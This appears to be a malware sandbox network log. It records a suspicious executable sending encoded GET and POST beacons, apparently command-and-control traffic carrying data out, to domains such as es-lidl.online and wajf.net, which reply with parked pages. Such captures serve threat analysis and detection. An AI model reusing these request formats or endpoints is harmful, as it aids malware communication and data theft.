                                                                                                                                                                                                              32192.168.2.960847156.242.132.82801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:35:43.033276081 CEST476OUTGET /b6g5/?tpTd=a8QqMioE13Jt2iPiOClkfJLiI6soJM7xy7KAtya8ruOCNgqe2jC0xyltzPPw7ePD7gDMaG5P8Bx9i7otBFrSmSNv5WmdoflN7m2YOZj8dE3cyj5SIw==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.shanhaiguan.net
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              33192.168.2.96084884.32.84.32801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:17.746534109 CEST737OUTPOST /n2dv/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.es-lidl.online
                                                                                                                                                                                                              Origin: http://www.es-lidl.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.es-lidl.online/n2dv/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 57 43 2f 4b 6c 76 75 78 4b 4d 31 4a 7a 39 51 77 4c 47 41 68 32 35 62 42 51 4c 4e 5a 54 55 6b 69 6c 51 35 4f 4a 41 55 32 31 33 4b 59 50 30 62 78 71 79 37 58 4d 52 2b 43 64 67 77 79 46 66 30 61 69 4a 44 71 79 74 30 6d 68 63 4c 51 2f 65 56 42 47 64 4f 63 47 36 57 53 70 5a 2b 66 61 4c 68 63 35 58 4c 47 70 4d 59 57 7a 30 76 4b 76 39 36 34 37 74 33 4f 32 42 6a 4e 6e 2b 4d 78 6d 65 2f 76 66 44 69 76 37 42 6d 68 6f 61 64 39 42 76 44 71 65 4f 6e 6f 56 6e 68 6c 61 61 2f 43 51 5a 5a 30 39 2b 47 32 4f 30 6a 67 67 37 42 76 75 71 43 68
                                                                                                                                                                                                              Data Ascii: tpTd=WMwPXkgP/5p6WC/KlvuxKM1Jz9QwLGAh25bBQLNZTUkilQ5OJAU213KYP0bxqy7XMR+CdgwyFf0aiJDqyt0mhcLQ/eVBGdOcG6WSpZ+faLhc5XLGpMYWz0vKv9647t3O2BjNn+Mxme/vfDiv7Bmhoad9BvDqeOnoVnhlaa/CQZZ09+G2O0jgg7BvuqCh


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              34192.168.2.96084984.32.84.32801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:20.289485931 CEST761OUTPOST /n2dv/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.es-lidl.online
                                                                                                                                                                                                              Origin: http://www.es-lidl.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.es-lidl.online/n2dv/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 45 53 50 4b 6a 4f 75 78 4e 73 31 4b 32 39 51 77 51 57 41 6c 32 35 48 42 51 4f 30 43 53 69 55 69 6c 78 4a 4f 62 31 30 32 32 33 4b 59 45 55 62 77 30 43 37 63 4d 52 6a 33 64 69 6b 79 46 62 6b 61 69 4a 7a 71 7a 65 4d 68 6e 4d 4c 57 7a 2b 56 35 62 74 4f 63 47 36 57 53 70 5a 36 68 61 4c 35 63 35 6e 58 47 71 75 67 52 2b 55 75 34 2f 4e 36 34 77 4e 33 43 32 42 6a 56 6e 39 49 49 6d 63 48 76 66 48 71 76 37 54 4f 75 69 61 63 34 46 76 44 31 52 4f 69 77 5a 32 39 33 63 4a 6e 59 51 6f 4a 50 7a 2f 6d 6f 66 47 71 37 31 73 42 49 70 4e 4c 4a 56 39 4d 52 44 76 6e 76 42 4c 62 32 32 49 6e 61 6a 30 64 57 67 41 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=WMwPXkgP/5p6ESPKjOuxNs1K29QwQWAl25HBQO0CSiUilxJOb10223KYEUbw0C7cMRj3dikyFbkaiJzqzeMhnMLWz+V5btOcG6WSpZ6haL5c5nXGqugR+Uu4/N64wN3C2BjVn9IImcHvfHqv7TOuiac4FvD1ROiwZ293cJnYQoJPz/mofGq71sBIpNLJV9MRDvnvBLb22Inaj0dWgA==


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              35192.168.2.96085084.32.84.32801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:22.838145971 CEST1774OUTPOST /n2dv/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.es-lidl.online
                                                                                                                                                                                                              Origin: http://www.es-lidl.online
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 1229
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.es-lidl.online/n2dv/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 57 4d 77 50 58 6b 67 50 2f 35 70 36 45 53 50 4b 6a 4f 75 78 4e 73 31 4b 32 39 51 77 51 57 41 6c 32 35 48 42 51 4f 30 43 53 68 30 69 6b 44 42 4f 4a 6b 30 32 33 33 4b 59 4e 30 62 39 30 43 37 42 4d 52 72 7a 64 69 59 49 46 5a 73 61 69 71 4c 71 30 76 4d 68 75 4d 4c 57 75 75 56 43 47 64 4f 4e 47 36 47 57 70 5a 4b 68 61 4c 35 63 35 6d 6e 47 39 73 59 52 74 45 76 4b 76 39 36 38 37 74 33 6d 32 42 62 72 6e 2b 6b 59 6e 76 50 76 52 47 57 76 34 67 6d 75 2f 71 63 36 43 76 43 67 52 50 65 52 5a 32 68 4b 63 49 6a 2b 51 76 46 50 78 59 50 4e 4c 6b 79 57 73 65 35 55 6a 75 6a 6d 4d 59 51 77 46 39 65 53 44 4c 7a 35 33 6f 36 46 6f 6e 77 67 37 46 31 51 44 52 63 53 2f 4b 52 6c 4a 30 58 33 62 69 44 43 51 37 47 78 79 6f 63 52 62 63 47 5a 30 68 43 4a 47 6a 52 2b 4a 32 6e 47 75 31 77 71 43 42 39 6d 79 34 4b 61 73 4a 57 54 66 55 66 6f 65 51 34 6d 77 4f 34 2f 38 57 78 77 32 34 57 32 43 67 6d 55 6c 49 6f 63 4b 53 38 5a 58 6e 76 49 48 68 38 30 78 34 34 44 48 6d 76 74 43 6a 68 59 30 51 4e 67 62 38 31 49 32 56 35 57 67 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: tpTd=WMwPXkgP/5p6ESPKjOuxNs1K29QwQWAl25HBQO0CSh0ikDBOJk0233KYN0b90C7BMRrzdiYIFZsaiqLq0vMhuMLWuuVCGdONG6GWpZKhaL5c5mnG9sYRtEvKv9687t3m2Bbrn+kYnvPvRGWv4gmu/qc6CvCgRPeRZ2hKcIj+QvFPxYPNLkyWse5UjujmMYQwF9eSDLz53o6Fonwg7F1QDRcS/KRlJ0X3biDCQ7GxyocRbcGZ0hCJGjR+J2nGu1wqCB9my4KasJWTfUfoeQ4mwO4/8Wxw24W2CgmUlIocKS8ZXnvIHh80x44DHmvtCjhY0QNgb81I2V5WgjpfiiWroEhUw5Lxs2nO22XgD6aXsoqpy5fTsTpJWeZhuAkmZEuV4LyG+tgitkFgUMdRs0awJVmkxFXM9e29czuUrFGqxndTeccA6BBbOqy0W04XpAIXKaTsAe8bpNrVYi4aU5f0cFbhm1QOlYZSuBP3LsYv//2BMZSXDmszWaPxbk9KpU0lCObXlp4Np/ZDQi0H7jYGVXV4b0y5rIokMnOyIGRDR6w4ViFJlTXNIjTGbKHtXFrGb6XW2L7FgYX/dVGJmkwm69zx7ky5rAMEx5g3dRW5+hfRGIelZ2ywVGXEdVNNLkn99K/xY72NA8VqWLzlDV/EXqQMQQ5M/wFEjHLdTvwsDdLupRudTE0Sqgd7ilvxgm1n/gyKNVZmvYnBLntWH+PYJ3V7slazEBSveP7IB3dFoTH6TBnOMoscU+edp/w9JWLNr5wkxP7LsiAQYkotfwc4HWCPM/W8fiUdyBjbym6J3Ix6YNE3dW1woU+ImafN/Uv58aWosemi1acogHxA9FoP2gWBTYy94vFO5/XHNBIhbwfzZN2lebp6Bc/Q6mbA2ajjkWR23L02MMhBR7kqe7mhW9BAvW6hTT5cLut5ZWd/CpI+v3ApCckuAbA6mw8bourFGxspsbIPzxJfJx0hk2HH7uV0IJkn7Mo+ytM2OPHKFBcn9y4 [TRUNCATED]


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              36192.168.2.96085184.32.84.32801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.378170967 CEST475OUTGET /n2dv/?tpTd=bOYvUT8qr4FCBQL4q+W2EOsk7MURICY42o+fYfsEfk4vvxNQfURJ5XqGAnjP2wivb2XfCAEuS6lNjanH3pgkh9rgu/pEJ/+PKIa4gq6/Dbg2n2byoA==&WX=rnWllP5PLlhLLtj HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.es-lidl.online
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860763073 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: hcdn
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:25 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 10072
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              x-hcdn-request-id: 588b82f8782d10ed1e8522cb380a3e32-bos-edge1
                                                                                                                                                                                                              Expires: Tue, 08 Oct 2024 13:36:24 GMT
                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860809088 CEST224INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                                                                                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860832930 CEST1236INData Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                                                                                                                                                                                                              Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860857010 CEST1236INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                                                                                                                                                                                                              Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860876083 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                                                                                                                                                                                                              Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860898972 CEST1236INData Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                                                                                                                                                                              Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.860920906 CEST1236INData Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
                                                                                                                                                                                                              Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861382008 CEST1236INData Raw: 73 65 71 75 65 6e 63 65 22 29 3b 72 3d 28 28 31 30 32 33 26 72 29 3c 3c 31 30 29 2b 28 31 30 32 33 26 65 29 2b 36 35 35 33 36 7d 6e 2e 70 75 73 68 28 72 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b
                                                                                                                                                                                                              Data Ascii: sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fr
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861398935 CEST776INData Raw: 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 33 29 22 29 3b 61 2b 3d 4d 61
                                                                                                                                                                                                              Data Ascii: length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase
                                                                                                                                                                                                              Oct 8, 2024 15:36:25.861428976 CEST760INData Raw: 64 3d 30 3b 64 3c 76 3b 2b 2b 64 29 7b 69 66 28 28 43 3d 74 5b 64 5d 29 3c 68 26 26 2b 2b 66 3e 72 29 72 65 74 75 72 6e 20 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 32 29 22 29 3b 69 66 28 43 3d 3d 68 29 7b 66 6f
                                                                                                                                                                                                              Data Ascii: d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              37192.168.2.9608523.91.127.116801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.364955902 CEST719OUTPOST /eoqq/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.wajf.net
                                                                                                                                                                                                              Origin: http://www.wajf.net
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 193
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.wajf.net/eoqq/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 62 64 79 74 34 6e 39 61 44 55 49 66 6d 45 35 36 37 76 6f 49 4f 63 68 32 52 5a 55 7a 41 54 42 77 74 74 74 34 73 66 70 31 41 43 56 4d 6e 53 32 50 71 6d 36 37 67 39 35 33 35 52 64 49 73 5a 6f 7a 58 36 43 4d 46 38 6e 4f 78 59 73 48 70 7a 31 68 2f 68 49 68 46 57 7a 74 6f 6c 6f 63 4d 67 73 51 45 62 41 2b 69 75 74 38 55 53 34 41 6c 38 51 64 77 41 64 57 44 6c 6f 67 44 74 43 4d 34 45 73 6f 6b 6f 79 78 35 6f 6a 76 74 69 71 45 76 43 72 35 63 4f 56 31 4e 59 4f 6d 79 59 63 6f 69 78 64 5a 4c 33 59 64 4a 6a 62 43 79 78 4f 55 76 71 7a 6f 34 5a 39 7a 6a 48 6b 4a 6e 55 78 2b
                                                                                                                                                                                                              Data Ascii: tpTd=bdyt4n9aDUIfmE567voIOch2RZUzATBwttt4sfp1ACVMnS2Pqm67g9535RdIsZozX6CMF8nOxYsHpz1h/hIhFWztolocMgsQEbA+iut8US4Al8QdwAdWDlogDtCM4Esokoyx5ojvtiqEvCr5cOV1NYOmyYcoixdZL3YdJjbCyxOUvqzo4Z9zjHkJnUx+
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833496094 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:36:31 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833519936 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                              Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833544016 CEST1236INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                              Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                                                                                                                                                                                              Oct 8, 2024 15:36:31.833554983 CEST1236INData Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
                                                                                                                                                                                                              Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
